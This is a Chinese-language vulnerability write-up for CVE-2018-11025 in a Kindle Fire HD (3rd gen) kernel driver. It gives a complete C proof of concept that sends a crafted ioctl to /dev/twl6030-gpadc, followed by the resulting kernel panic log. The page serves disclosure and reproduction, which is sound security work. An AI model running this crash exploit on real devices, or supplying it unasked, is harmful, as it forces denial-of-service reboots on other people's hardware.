跳转至

(CVE 2018 11025)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞

一、漏洞简介

Amazon Kindle Fire HD(3rd)Fire OS 4.5.5.3内核组件中的内核模块/omap/drivers/mfd/twl6030-gpadc.c允许攻击者通过设备/ dev / twl6030上的ioctl的参数注入特制的参数-gpadc命令**24832**并导致内核崩溃。

要探索此漏洞,必须打开设备文件/ dev / twl6030-gpadc,并使用命令**24832**和精心设计的有效负载作为第三个参数在此设备文件上调用ioctl系统调用。

二、漏洞影响

Fire OS 4.5.5.3

三、复现过程

poc

/*
 * This is poc of Kindle Fire HD 3rd
 * A bug in the ioctl interface of device file /dev/twl6030-gpadc causes 
 * the system crash via IOCTL 24832. 
 *
 * This Poc should run with permission to do ioctl on /dev/twl6030-gpadc.
 *
 */
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>
#include <sys/ioctl.h>

const static char *driver = "/dev/twl6030-gpadc";
static command = 24832; 

struct twl6030_gpadc_user_parms {
    int channel;
    int status;
    unsigned short result;
};


int main(int argc, char **argv, char **env) {
        struct twl6030_gpadc_user_parms payload;
        payload.channel = 0x9b2a9212;
        payload.status = 0x0;
        payload.result = 0x0;

        int fd = 0;
        fd = open(driver, O_RDWR);
        if (fd < 0) {
            printf("Failed to open %s, with errno %d\n", driver, errno);
            system("echo 1 > /data/local/tmp/log");
            return -1;
        }

        printf("Try ioctl device file '%s', with command 0x%x and payload NULL\n", driver, command);
        printf("System will crash and reboot.\n");
        if(ioctl(fd, command, &payload) < 0) {
            printf("Allocation of structs failed, %d\n", errno);
            system("echo 2 > /data/local/tmp/log");
            return -1;
        }
        close(fd);
        return 0;
}

崩溃日志

[18460.321624] Unable to handle kernel paging request at virtual address 4b3f25fc
[18460.330139] pgd = ca210000
[18460.333251] [4b3f25fc] *pgd=00000000
[18460.337768] Internal error: Oops: 5 [#1] PREEMPT SMP ARM
[18460.343810] Modules linked in: omaplfb(O) pvrsrvkm(O) pvr_logger(O)
[18460.351440] CPU: 0    Tainted: G           O  (3.4.83-gd2afc0bae69 #1)
[18460.358825] PC is at twl6030_gpadc_ioctl+0x160/0x180
[18460.364379] LR is at twl6030_gpadc_conversion+0x5c/0x484
[18460.370452] pc : [<c031b080>]    lr : [<c031a950>]    psr: 60030013
[18460.370452] sp : de94dd90  ip : 00000000  fp : de94df04
[18460.383422] r10: 00000000  r9 : dcccf608  r8 : bea875ec
[18460.389282] r7 : de94c000  r6 : 00000000  r5 : 00006100  r4 : bea875ec
[18460.396697] r3 : fffffeb4  r2 : 4b3f2730  r1 : de94dee8  r0 : 00000001
[18460.404113] Flags: nZCv  IRQs on  FIQs on  Mode SVC_32  ISA ARM  Segment user
[18460.412048] Control: 10c5387d  Table: 8a21004a  DAC: 00000015
[18460.418609] 
[18460.418609] PC: 0xc031b000:
[18460.423583] b000  e24b101c e30f3eb4 e34f3fff e0822082 e0812102 e51220e4 e18120b3 e5973008
[18460.434234] b020  e294200c 30d22003 33a03000 e3530000 0a000006 e3e0000c e24bd01c e89da8f0
[18460.444885] b040  e24b0e17 e3a0100c ebfcf5c4 eafffff8 e1a00004 e24b1e17 e3a0200c ebfced7f
[18460.455444] b060  e3500000 0afffff3 eafffff1 e51b2170 e24b101c e30f3eb4 e34f3fff e0812102
[18460.465972] b080  e5122134 e18120b3 eaffffe3 03e0303c 150b016c 050b316c eaffffdf c0acabbc
[18460.476623] b0a0  e1a0c00d e92dd800 e24cb004 e59030e0 e3530000 159000ec 03e00012 e89da800
[18460.487182] b0c0  e1a0c00d e92dd800 e24cb004 e59000f0 e89da800 e1a0c00d e92dd800 e24cb004
[18460.497863] b0e0  e5d020e9 e5d030e8 e1820003 e2000003 e89da800 e1a0c00d e92dd800 e24cb004
[18460.508544] 
[18460.508544] LR: 0xc031a8d0:
[18460.513519] a8d0  e89da878 e1a00004 ebffff20 e2000003 e3500002 13e0000a 03a00000 e89da878
[18460.524078] a8f0  c09ba0c0 e1a0c00d e92ddff0 e24cb004 e24dd014 e2509000 0a000114 e59f5454
[18460.534759] a910  e595008c e3500000 0a00010b e2800004 eb0e1ff0 e1d910b6 e3510001 9a00000a
[18460.545318] a930  e595308c e3e06015 e59f142c e5930000 ebff4e6b e595a08c e28a0004 eb0e1f69
[18460.555999] a950  e1a00006 e24bd028 e89daff0 e595a08c e3a03f52 e023a193 e5933038 e3530000
[18460.566680] a970  13e0600f 1afffff3 e59a32c4 e0818101 e595c088 e3130010 e08c7008 1a000025
[18460.577331] a990  e3510000 0a0000c4 e1d930b8 e3530001 0a0000d7 e1d940b6 e3540000 0a0000bc
[18460.587890] a9b0  e3a0000e e3a01002 e3a02090 e5956088 ebfff8bc e3540001 0a0000d1 e1d920b6
[18460.598571] 
[18460.598571] SP: 0xde94dd10:
[18460.603546] dd10  00000000 0000000d de94dda0 10624dd3 de94dd4c c031b080 60030013 ffffffff
[18460.614196] dd30  de94dd7c bea875ec de94df04 de94dd48 c06a5318 c0008370 00000001 de94dee8
[18460.624877] dd50  4b3f2730 fffffeb4 bea875ec 00006100 00000000 de94c000 bea875ec dcccf608
[18460.635528] dd70  00000000 de94df04 00000000 de94dd90 c031a950 c031b080 60030013 ffffffff
[18460.646087] dd90  de94ddac 9b2a9212 00000000 00000000 00040000 0001f8fc 00000000 00000000
[18460.656738] ddb0  c00795a0 00000001 de94ddd4 de94ddc8 c00795b4 c00792bc de94de0c de94ddd8
[18460.667419] ddd0  c0070df8 c00795ac de94c000 00000001 00000004 dd32f8f4 60000013 00000001
[18460.678100] ddf0  00000001 00000004 dd32f800 00000000 00000000 de94de10 c00723a0 c06a4818
[18460.688629] 
[18460.688659] FP: 0xde94de84:
[18460.693725] de84  de94de90 c0207454 c00bd920 0000001e c26fda80 de94ded4 de94dea8 c00723a0
[18460.704284] dea4  000fffff 00000000 ffffffff 00000002 00000001 00000000 de94df14 00000000
[18460.714935] dec4  00000001 dcccf608 cfa9bf00 de94defc de94dee0 c02089fc 00000000 00000000
[18460.725616] dee4  00000000 00000000 d683fb40 00000004 d683fb40 de94df74 de94df08 c0136044
[18460.736328] df04  c031af2c 00000000 00000000 00000000 00000001 00000000 dd188490 d8f925d8
[18460.746856] df24  de94df0c de94c000 bea87618 bea875ec 00006100 d683fb40 00000004 de94c000
[18460.757537] df44  00000000 de94df64 00000000 bea875ec 00006100 d683fb40 00000004 de94c000
[18460.768096] df64  00000000 de94dfa4 de94df78 c01365e0 c0135fc4 00000000 00000000 00000400
[18460.778625] 
[18460.778625] R1: 0xde94de68:
[18460.783721] de68  c2572140 de94debc 00000001 00000028 000fffff 00000001 de94dedc de94de90
[18460.794403] de88  c0207454 c00bd920 0000001e c26fda80 de94ded4 de94dea8 c00723a0 000fffff
[18460.804962] dea8  00000000 ffffffff 00000002 00000001 00000000 de94df14 00000000 00000001
[18460.815643] dec8  dcccf608 cfa9bf00 de94defc de94dee0 c02089fc 00000000 00000000 00000000
[18460.826202] dee8  00000000 d683fb40 00000004 d683fb40 de94df74 de94df08 c0136044 c031af2c
[18460.836730] df08  00000000 00000000 00000000 00000001 00000000 dd188490 d8f925d8 de94df0c
[18460.847381] df28  de94c000 bea87618 bea875ec 00006100 d683fb40 00000004 de94c000 00000000
[18460.858032] df48  de94df64 00000000 bea875ec 00006100 d683fb40 00000004 de94c000 00000000
[18460.868713] 
[18460.868713] R3: 0xfffffe34:
[18460.873687] fe34  ******** ******** ******** ******** ******** ******** ******** ********
[18460.884246] fe54  ******** ******** ******** ******** ******** ******** ******** ********
[18460.894805] fe74  ******** ******** ******** ******** ******** ******** ******** ********
[18460.905456] fe94  ******** ******** ******** ******** ******** ******** ******** ********
[18460.916137] feb4  ******** ******** ******** ******** ******** ******** ******** ********
[18460.926788] fed4  ******** ******** ******** ******** ******** ******** ******** ********
[18460.937347] fef4  ******** ******** ******** ******** ******** ******** ******** ********
[18460.948028] ff14  ******** ******** ******** ******** ******** ******** ******** ********
[18460.958709] 
[18460.958709] R7: 0xde94bf80:
[18460.963684] bf80  de926680 c00635cc 00000013 de84190c de926680 c00635cc 00000013 00000000
[18460.974365] bfa0  00000000 00000000 de94bff4 de94bfb8 c0068af4 c00635d8 00000000 00000000
[18460.985015] bfc0  de926680 00000000 00000000 00000000 de94bfd0 de94bfd0 00000000 de84190c
[18460.995574] bfe0  c0068a64 c004cd64 00000000 de94bff8 c004cd64 c0068a70 1d04e2fb 1dfbe204
[18461.006225] c000  00000000 00000002 00000000 c2572140 c0a0e840 00000000 00000015 cf9fca80
[18461.016906] c020  00000000 de94c000 c09ddc50 c2572140 c25717c0 c1617b40 de94da7c de94d9c8
[18461.027587] c040  c06a36e4 00000000 00000000 00000000 00000000 00000000 01000000 00000000
[18461.038146] c060  00c5f4c0 5ebcc27f 00000000 00000000 00000000 00000000 00000000 00000000
[18461.048828] 
[18461.048828] R9: 0xdcccf588:
[18461.053802] f588  dcccf588 dcccf588 00000000 00000000 00000000 c06bc674 000200da c09dda58
[18461.064483] f5a8  00000000 00000000 dcccf5b0 dcccf5b0 00000000 dcccf5bc dcccf5bc 00000000
[18461.075134] f5c8  5ae3ed25 00000000 00000000 00000000 dcccf5e0 00000000 00000000 00000000
[18461.085815] f5e8  00200000 00000000 00000000 dcccf5f4 dcccf5f4 dccb2440 dccb2440 00000000
[18461.096343] f608  00052180 00000000 00000000 00000000 00000000 00000000 c06b9600 dd1a4800
[18461.107025] f628  dcccf6e0 dccb0300 00000c45 00000001 00a0003b 5ae3ed25 2bc5ac58 5ae3ed25
[18461.117675] f648  2bc5ac58 5ae3ed25 2bc5ac58 00000000 00000000 00000000 00000000 00000000
[18461.128234] f668  00000000 00000000 00000000 00000000 00000001 00000000 00000000 dcccf684
[18461.138885] Process twl6030_gpadc_i (pid: 12849, stack limit = 0xde94c2f8)
[18461.146697] Stack: (0xde94dd90 to 0xde94e000)
[18461.151611] dd80:                                     de94ddac 9b2a9212 00000000 00000000
[18461.160827] dda0: 00040000 0001f8fc 00000000 00000000 c00795a0 00000001 de94ddd4 de94ddc8
[18461.170043] ddc0: c00795b4 c00792bc de94de0c de94ddd8 c0070df8 c00795ac de94c000 00000001
[18461.179138] dde0: 00000004 dd32f8f4 60000013 00000001 00000001 00000004 dd32f800 00000000
[18461.188354] de00: 00000000 de94de10 c00723a0 c06a4818 00000004 00000001 dd32e0d8 dd32f800
[18461.197570] de20: dd32e000 0000000a de94c000 c26fda80 de94de54 de94de40 c02ba53c c0072360
[18461.206787] de40: dd32f800 dd32e000 de94de74 de94de58 c02c3c88 c02ba518 dd32e000 00000002
[18461.215881] de60: 00000002 dd32fbbc c2572140 de94debc 00000001 00000028 000fffff 00000001
[18461.225097] de80: de94dedc de94de90 c0207454 c00bd920 0000001e c26fda80 de94ded4 de94dea8
[18461.234313] dea0: c00723a0 000fffff 00000000 ffffffff 00000002 00000001 00000000 de94df14
[18461.243408] dec0: 00000000 00000001 dcccf608 cfa9bf00 de94defc de94dee0 c02089fc 00000000
[18461.252624] dee0: 00000000 00000000 00000000 d683fb40 00000004 d683fb40 de94df74 de94df08
[18461.261840] df00: c0136044 c031af2c 00000000 00000000 00000000 00000001 00000000 dd188490
[18461.271057] df20: d8f925d8 de94df0c de94c000 bea87618 bea875ec 00006100 d683fb40 00000004
[18461.280151] df40: de94c000 00000000 de94df64 00000000 bea875ec 00006100 d683fb40 00000004
[18461.289367] df60: de94c000 00000000 de94dfa4 de94df78 c01365e0 c0135fc4 00000000 00000000
[18461.298583] df80: 00000400 bea87618 00010e5c 00000000 00000036 c0013e08 00000000 de94dfa8
[18461.307800] dfa0: c0013c60 c0136578 bea87618 00010e5c 00000004 00006100 bea875ec bea875ec
[18461.316894] dfc0: bea87618 00010e5c 00000000 00000036 00000000 00000000 00000000 bea87604
[18461.326110] dfe0: 00000000 bea875d4 00010698 0002918c 60000010 00000004 00000000 00000000
[18461.335296] Backtrace: 
[18461.338317] [<c031af20>] (twl6030_gpadc_ioctl+0x0/0x180) from [<c0136044>] (do_vfs_ioctl+0x8c/0x5b4)
[18461.348571]  r7:d683fb40 r6:00000004 r5:d683fb40 r4:00000000
[18461.355560] [<c0135fb8>] (do_vfs_ioctl+0x0/0x5b4) from [<c01365e0>] (sys_ioctl+0x74/0x84)
[18461.364807] [<c013656c>] (sys_ioctl+0x0/0x84) from [<c0013c60>] (ret_fast_syscall+0x0/0x30)
[18461.374206]  r8:c0013e08 r7:00000036 r6:00000000 r5:00010e5c r4:bea87618
[18461.382507] Code: e24b101c e30f3eb4 e34f3fff e0812102 (e5122134) 
[18461.401061] Board Information: 
[18461.401061]  Revision : 0001
[18461.401092]  Serial    : 0000000000000000
[18461.401092] SoC Information:
[18461.401092]  CPU    : OMAP4470
[18461.401122]  Rev    : ES1.0
[18461.401122]  Type    : HS
[18461.401122]  Production ID: 0002B975-000000CC
[18461.401122]  Die ID    : 1CC60000-50002FFF-0B00935D-11007004
[18461.401153] 
[18461.406127] audit_printk_skb: 111 callbacks suppressed
[18461.406127] type=1400 audit(1525657115.783:1097): avc:  denied  { getattr } for  pid=12851 comm="am" path="/system/bin/app_process" dev="mmcblk0p9" ino=32006 scontext=u:r:untrusted_app:s0 tcontext=u:object_r:zygote_exec:s0 tclass=file
[18461.406280] type=1400 audit(1525657115.783:1098): avc:  denied  { execute } for  pid=12851 comm="am" name="app_process" dev="mmcblk0p9" ino=32006 scontext=u:r:untrusted_app:s0 tcontext=u:object_r:zygote_exec:s0 tclass=file
[18461.406524] type=1400 audit(1525657115.783:1099): avc:  denied  { read open } for  pid=12851 comm="am" name="app_process" dev="mmcblk0p9" ino=32006 scontext=u:r:untrusted_app:s0 tcontext=u:object_r:zygote_exec:s0 tclass=file
[18461.406768] type=1400 audit(1525657115.783:1100): avc:  denied  { execute_no_trans } for  pid=12851 comm="am" path="/system/bin/app_process" dev="mmcblk0p9" ino=32006 scontext=u:r:untrusted_app:s0 tcontext=u:object_r:zygote_exec:s0 tclass=file
[18461.534057] ---[ end trace f98f4a7b98572f61 ]---
[18461.540374] Kernel panic - not syncing: Fatal exception
[18461.546173] CPU1: stopping
[18461.549285] Backtrace: 
[18461.552459] [<c0018148>] (dump_backtrace+0x0/0x10c) from [<c0698bb8>] (dump_stack+0x18/0x1c)
[18461.561828]  r6:c09ddc50 r5:c09dc844 r4:00000001 r3:c0a0e950
[18461.568969] [<c0698ba0>] (dump_stack+0x0/0x1c) from [<c0019bd8>] (handle_IPI+0x190/0x1c4)
[18461.578185] [<c0019a48>] (handle_IPI+0x0/0x1c4) from [<c00084fc>] (gic_handle_irq+0x58/0x60)
[18461.587554] [<c00084a4>] (gic_handle_irq+0x0/0x60) from [<c06a5540>] (__irq_usr+0x40/0x60)
[18461.596862] Exception stack(0xc8967fb0 to 0xc8967ff8)
[18461.602691] 7fa0:                                     404143ed 4041294b 00000054 000012f0
[18461.611755] 7fc0: 4028cdb4 4040e438 0000012f 4041294b 4040d148 404111d8 beb9c2e0 404275c0
[18461.620971] 7fe0: 40416bef beb9c1f0 4009d01f 400a0ec0 000f0010 ffffffff
[18461.628478]  r6:ffffffff r5:000f0010 r4:400a0ec0 r3:404143ed
[18461.635559] CPU0 PC (0) : 0xc003ee38
[18461.639617] CPU0 PC (1) : 0xc003ee54
[18461.643798] CPU0 PC (2) : 0xc003ee54
[18461.647857] CPU0 PC (3) : 0xc003ee54
[18461.651916] CPU0 PC (4) : 0xc003ee54
[18461.656097] CPU0 PC (5) : 0xc003ee54
[18461.660156] CPU0 PC (6) : 0xc003ee54
[18461.664215] CPU0 PC (7) : 0xc003ee54
[18461.668395] CPU0 PC (8) : 0xc003ee54
[18461.672454] CPU0 PC (9) : 0xc003ee54
[18461.676513] CPU1 PC (0) : 0xc0019b2c
[18461.680694] CPU1 PC (1) : 0xc0019b2c
[18461.684753] CPU1 PC (2) : 0xc0019b2c
[18461.688812] CPU1 PC (3) : 0xc0019b2c
[18461.692871] CPU1 PC (4) : 0xc0019b2c
[18461.697051] CPU1 PC (5) : 0xc0019b2c
[18461.701110] CPU1 PC (6) : 0xc0019b2c
[18461.705169] CPU1 PC (7) : 0xc0019b2c
[18461.709381] CPU1 PC (8) : 0xc0019b2c
[18461.713409] CPU1 PC (9) : 0xc0019b2c
[18461.717498] 
[18461.719268] Restarting Linux version 3.4.83-gd2afc0bae69 (build@14-use1a-b-39) (gcc version 4.7 (GCC) ) #1 SMP PREEMPT Tue Sep 19 22:04:47 UTC 2017
[18461.719299]